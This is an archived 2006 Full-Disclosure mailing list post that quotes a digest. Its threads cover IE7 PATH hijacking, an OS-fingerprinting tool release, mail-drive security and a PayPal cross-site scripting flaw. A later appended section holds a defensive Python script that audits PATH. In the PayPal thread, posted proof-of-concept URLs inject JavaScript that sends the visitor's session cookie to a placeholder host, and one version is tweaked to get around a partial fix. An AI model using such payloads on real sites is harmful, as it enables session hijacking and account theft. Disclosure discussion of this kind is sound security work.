Message-ID: <ed01adde0611061008m3c4cfb91u43c043f19d20f10d@mail.gmail.com>
Date: Mon, 6 Nov 2006 13:08:59 -0500
From: Fig <digital.figlet@...il.com>
To: full-disclosure@...ts.grok.org.uk
Subject: help
help
On 11/6/06, full-disclosure-request@...ts.grok.org.uk
<full-disclosure-request@...ts.grok.org.uk> wrote:
> Send Full-Disclosure mailing list submissions to
> full-disclosure@...ts.grok.org.uk
>
> To subscribe or unsubscribe via the World Wide Web, visit
> https://lists.grok.org.uk/mailman/listinfo/full-disclosure
> or, via email, send a message with subject or body 'help' to
> full-disclosure-request@...ts.grok.org.uk
>
> You can reach the person managing the list at
> full-disclosure-owner@...ts.grok.org.uk
>
> When replying, please edit your Subject line so it is more specific
> than "Re: Contents of Full-Disclosure digest..."
>
>
> Note to digest recipients - when replying to digest posts, please trim your
> post appropriately. Thank you.
>
>
> Today's Topics:
>
> 1. Re: Internet Explorer 7 - Still Spyware Writers' Heaven
> (Joshua Gimer)
> 2. SinFP 2.04 release, works under Windows (GomoR)
> 3. Re: Mail Drives Security Considerations (gabriel rosenkoetter)
> 4. Re: alert() (Matthew Flaschen)
> 5. Re: Mail Drives Security Considerations (Darkz)
> 6. Re: Internet Explorer 7 - Still Spyware Writers' Heaven
> (Roger A. Grimes)
>
>
> ----------------------------------------------------------------------
>
> Message: 1
> Date: Sat, 4 Nov 2006 13:15:35 -0700
> From: "Joshua Gimer" <jgimer@...il.com>
> Subject: Re: [Full-disclosure] Internet Explorer 7 - Still Spyware
> Writers' Heaven
> To: "Eliah Kagan" <degeneracypressure@...il.com>
> Cc: full-disclosure@...ts.grok.org.uk, bugtraq@...urityfocus.com
> Message-ID:
> <cf939bff0611041215u28faffd5j211562633f7a9b3d@...l.gmail.com>
> Content-Type: text/plain; charset="iso-8859-1"
>
> If Microsoft is not planning on providing a fix for this until Vista, I can
> see a worm coming from this. Forgive me if I don't know how this works in
> the windows world, but when it is looking for this DLL, does it take the
> first one that it finds within your path; like in UNIX? Or does it look in
> all directories within your path and then decide? I am guessing the former,
> but I am just clarifying.
>
> On 11/3/06, Eliah Kagan <degeneracypressure@...il.com> wrote:
> >
> > On 11/2/06, Roger A. Grimes wrote:
> > > So, if your statement is accurate that malware would need to be placed
> > > in a directory identified by the PATH statement, we can relax because
> > > that would require Administrator access to pull off. Admin access would
> > > be needed to modify the PATH statement appropriately to include the
> > > user's desktop or some other new user writable location or Admin access
> > > would be needed to copy a file into the locations indicated by the
> > > default PATH statement.
> >
> > It would not require *administrator* access--non-administrator users
> > can still add things to their own PATHs, just not to the universal,
> > system PATH. (See Control Panel > System > Advanced > Environment
> > Variables.)
> >
> > -Eliah
> >
>
>
>
> --
> Thx
> Joshua Gimer
> -------------- next part --------------
> An HTML attachment was scrubbed...
> URL:
> http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061104/b97c9d1d/attachment-0001.html
>
> ------------------------------
>
> Message: 2
> Date: Sun, 5 Nov 2006 20:02:28 +0100
> From: GomoR <fd@...or.org>
> Subject: [Full-disclosure] SinFP 2.04 release, works under Windows
> To: full-disclosure@...ts.grok.org.uk
> Message-ID: <20061105190228.GD23011@...ima.enslaved.lan>
> Content-Type: text/plain; charset=us-ascii
>
> Hi,
>
> I'm pleased to announce the availability of SinFP 2.04, which now can
> run under Windows ActivePerl.
>
> SinFP is a new approach to active and passive OS fingerprinting, you can
> know more about its features here:
> http://www.gomor.org/sinfp
>
> SinFP has now more than 130 signatures in its database.
>
> To be informed about new signature files, subscribe to:
> http://lists.sourceforge.net/lists/listinfo/sinfp-discuss
>
> Installation instructions can be found here:
> http://www.gomor.org/cgi-bin/index.pl?mode=view;page=sinfp#3
>
> For Windows users, follow these instructions:
>
> This was tested with ActivePerl 5.8.8.819, with PPM v4.0.
>
> # If you are behind a proxy:
> C:\> set http_proxy=http://username:password@...xy:port
>
> # Add gomor repository
> C:\> ppm repo add gomor http://www.gomor.org/files/ppm/repo-8xx
>
> # Disable all other repo, if you have many. Or only ActiveState repo
> # by default
> C:\> ppm repo 1 off
> ...
> C:\> ppm install Net-SinFP
>
> # Re-enable all other repo
> C:\> ppm repo 1 on
> ...
>
> Launch it:
> C:\> perl C:\perl\site\bin\sinfp.pl
>
> If you have error messages about failing to load some .dll, go to
> www.microsoft.com. Then, in the search field, type in vcredist_x86.exe,
> download it and install it.
>
> Please, do not hesitate to submit new signatures to sinfp_at_gomor.org,
> or on the mailing list.
>
> Best regards,
>
> --
> ^ ___ ___ http://www.GomoR.org/ <-+
> | / __ |__/ Systems & Security Engineer |
> | \__/ | \ ---[ zsh$ alias psed='perl -pe ' ]--- |
> +--> Net::Packet <=> http://search.cpan.org/~gomor/ <--+
>
>
>
> ------------------------------
>
> Message: 3
> Date: Sun, 5 Nov 2006 18:18:10 -0500
> From: gabriel rosenkoetter <gr@...ipsed.net>
> Subject: Re: [Full-disclosure] Mail Drives Security Considerations
> To: full-disclosure@...ts.grok.org.uk
> Message-ID: <20061105231810.GD36176@...w.eclipsed.net>
> Content-Type: text/plain; charset="us-ascii"
>
> On Fri, Nov 03, 2006 at 11:28:27AM -0500, Matthew Flaschen wrote:
> > Why can't message signing offer backwards compatibility (assuming you
> > use multipart/signed)?
>
> Seems to me that adding a PGP signature verification to every
> operation on files (even ls(1); you have to check to make sure it's
> not a spoofed file) would rather noticeably impact the
> performance of what's already got to be pretty slow on most users'
> connections, and it adds a layer of complexity to the setup (you
> have to generate the key pair, and have the private key available on
> any system on which you intend to have write access) but that would certainly
> work. Spam will still be a DoS against storage space, of course.
>
> Never mind that this software violates gmail's acceptable use
> policy and is transmitted back and forth in the clear (unless you
> want to roll PGP encryption into the mix, in which case keeping
> paths in the clear in the subject breaks the security), so it'd be
> hard to view data stored this way as being "secure" to begin with...
>
> --
> gabriel rosenkoetter
> gr@...ipsed.net
> -------------- next part --------------
> A non-text attachment was scrubbed...
> Name: not available
> Type: application/pgp-signature
> Size: 189 bytes
> Desc: not available
> Url :
> http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061105/669fedd5/attachment-0001.bin
>
> ------------------------------
>
> Message: 4
> Date: Sun, 05 Nov 2006 22:24:25 -0500
> From: Matthew Flaschen <matthew.flaschen@...ech.edu>
> Subject: Re: [Full-disclosure] alert()
> To: Matthew Flaschen <matthew.flaschen@...ech.edu>
> Cc: full-disclosure@...ts.grok.org.uk, spoof@...pal.com
> Message-ID: <454EAAE9.9030500@...ech.edu>
> Content-Type: text/plain; charset="iso-8859-1"
>
> Hmm, I got an email from Paypal, saying
>
> "Thank you for bringing this incident of suspicious activity to our
> attention. PayPal will investigate this activity immediately and contact
> you further if any additional information is required.[...]"
>
> I'm fairly certain they're referring to this exploit, which I CCed them
> on my previous post.
>
> Also, the POC I posted no longer works. It looks like Paypal is no
> longer unescaping double quotation marks. Thus, the script fails to
> append the cookie. At any rate, just changing the double quotes to
> single quotes makes the POC work again:
>
> https://www.paypal.com/cgi-bin/webscr?cmd=xpt/popup/RandomAccessKey-outside&voice=javascript:window.location='http://fooHost/tracker.php?'%2Bdocument.cookie
>
> Matt Flaschen
>
> Matthew Flaschen wrote:
> > Good find. How about using it to steal the entire PayPal cookie, though:
> >
> https://www.paypal.com/cgi-bin/webscr?cmd=xpt/popup/RandomAccessKey-outside&voice=javascript:window.location=%22http://fooHost/tracker.php?%22%2Bdocument.cookie;
> >
> >
> > auto113922@...h.ai wrote:
> >> https://www.paypal.com/cgi-bin/webscr?cmd=xpt/popup/RandomAccessKey-
> >> outside&voice=javascript:document.write('heh');alert('bl00p');
> >>
> >>
> >>
> >> Concerned about your privacy? Instantly send FREE secure email, no
> account required
> >> http://www.hushmail.com/send?l=480
> >>
> >> Get the best prices on SSL certificates from Hushmail
> >> https://www.hushssl.com?l=485
> >>
> >> _______________________________________________
> >> Full-Disclosure - We believe in it.
> >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> >> Hosted and sponsored by Secunia - http://secunia.com/
> >>
> >
> >
> >
> > ------------------------------------------------------------------------
> >
> > _______________________________________________
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia - http://secunia.com/
>
>
> -------------- next part --------------
> A non-text attachment was scrubbed...
> Name: signature.asc
> Type: application/pgp-signature
> Size: 250 bytes
> Desc: OpenPGP digital signature
> Url :
> http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061105/e53d7a03/attachment-0001.bin
>
> ------------------------------
>
> Message: 5
> Date: Mon, 06 Nov 2006 10:36:10 +0200
> From: Darkz <darkz.gsa@...il.com>
> Subject: Re: [Full-disclosure] Mail Drives Security Considerations
> To: Matthew Flaschen <matthew.flaschen@...ech.edu>,
> full-disclosure@...ts.grok.org.uk
> Message-ID: <454EF3FA.6040409@...il.com>
> Content-Type: text/plain; charset="us-ascii"
>
> An HTML attachment was scrubbed...
> URL:
> http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061106/76d0ca99/attachment-0001.html
>
> ------------------------------
>
> Message: 6
> Date: Sun, 5 Nov 2006 22:35:25 -0500
> From: "Roger A. Grimes" <roger@...neretcs.com>
> Subject: Re: [Full-disclosure] Internet Explorer 7 - Still Spyware
> Writers' Heaven
> To: "Eliah Kagan" <degeneracypressure@...il.com>,
> <full-disclosure@...ts.grok.org.uk>, <bugtraq@...urityfocus.com>
> Message-ID:
> <096A04F511B7FD4995AE55F13824B8331983BB@...neretcs1.local.banneretcs.com>
>
> Content-Type: text/plain; charset="us-ascii"
>
> So all the malware writer has to do now is figure out how to do the
> initial exploit in the first place, that would then allow them to muck
> with path statements or place code in path executable areas. I mean, do
> you get it, yet? If the malware writer figures out how to do the initial
> exploit, anything can be done, not just the path tricks.
>
> My WhereWindowsMalwareHides document
> (http://weblog.infoworld.com/securityadviser/archives/2006/05/updated_where_w.html)
> contains over 145 different tricks and locations
> where malware can hide and live, along with the path trick. Your point
> is a valid point, but it's been a known issue for years.
>
> You can't skip over the hardest part, the initial exploit, and start
> picking on one of over a hundred ways to muck with Windows users and
> call "IE 7 a Spyware Writer's Heaven". I mean you can, but it looks like
> you're grasping at straws. At least tell us something new, and not
> something that's been documented for years.
>
> Roger
>
> -----Original Message-----
> From: Eliah Kagan [mailto:degeneracypressure@...il.com]
> Sent: Friday, November 03, 2006 9:26 PM
> To: full-disclosure@...ts.grok.org.uk; bugtraq@...urityfocus.com
> Subject: Re: Internet Explorer 7 - Still Spyware Writers' Heaven
>
> On 11/2/06, Roger A. Grimes wrote:
> > So, if your statement is accurate that malware would need to be
> > placed in a directory identified by the PATH statement, we can relax
> > because that would require Administrator access to pull off. Admin
> > access would be needed to modify the PATH statement appropriately to
> > include the user's desktop or some other new user writable location or
>
> > Admin access would be needed to copy a file into the locations
> > indicated by the default PATH statement.
>
> It would not require *administrator* access--non-administrator users can
> still add things to their own PATHs, just not to the universal, system
> PATH. (See Control Panel > System > Advanced > Environment
> Variables.)
>
> -Eliah
>
>
>
> ------------------------------
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
> End of Full-Disclosure Digest, Vol 21, Issue 9
> **********************************************
>
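The IE 7 thread quoted above turns on one point: a non-administrator can prepend a directory they control to their own PATH, so anything resolved by bare name through PATH can be shadowed. The script below is an added example (not code from the digest or any of its posters) that audits a PATH string for user-writable entries and reports whether each one sits ahead of the system directories; the sample PATH, the writable set and the `C:\Windows` system root are constructed. Note that for DLLs Windows consults PATH only after the application and system directories, so the audit matters most for executables launched by bare name.

```python
"""Audit a PATH string for user-writable directories (added example).

The digest thread argues that a user-level PATH change is enough to put
a planted file ahead of the real one; this audit flags PATH entries the
current user can write to and whether they precede the system directories
(search order is first match wins).
"""
import os
from typing import Callable, Dict, List


def audit_path(path_string: str, is_writable: Callable[[str], bool],
               system_roots: List[str], sep: str = ";") -> List[Dict]:
    """Return one finding per user-writable PATH entry.

    A finding records the entry, its position, and whether it comes before
    the first entry located under one of system_roots.
    """
    entries = [e for e in path_string.split(sep) if e]
    first_system = next(
        (i for i, e in enumerate(entries)
         if any(e.lower().startswith(r.lower()) for r in system_roots)),
        None)
    findings = []
    for idx, entry in enumerate(entries):
        if is_writable(entry):
            findings.append({
                "entry": entry,
                "index": idx,
                "before_system_dirs": first_system is None or idx < first_system,
            })
    return findings


def live_writable(path: str) -> bool:
    """Writability check against the real filesystem, for use on a host."""
    return os.path.isdir(path) and os.access(path, os.W_OK)


# Constructed sample (hypothetical host): user PATH with the desktop prepended.
SAMPLE_PATH = (r"C:\Users\alice\Desktop;C:\Windows\system32;C:\Windows;"
               r"C:\Users\alice\AppData\Local\Tools")
SAMPLE_WRITABLE = {r"C:\Users\alice\Desktop", r"C:\Users\alice\AppData\Local\Tools"}


def sample_findings() -> List[Dict]:
    """Run the audit over the constructed sample instead of the live PATH."""
    return audit_path(SAMPLE_PATH, lambda p: p in SAMPLE_WRITABLE,
                      system_roots=[r"C:\Windows"])


if __name__ == "__main__":
    for finding in sample_findings():
        print(finding)
```

On a real host, call `audit_path(os.environ["PATH"], live_writable, [...], os.pathsep)` with the system roots that apply to that platform.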
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/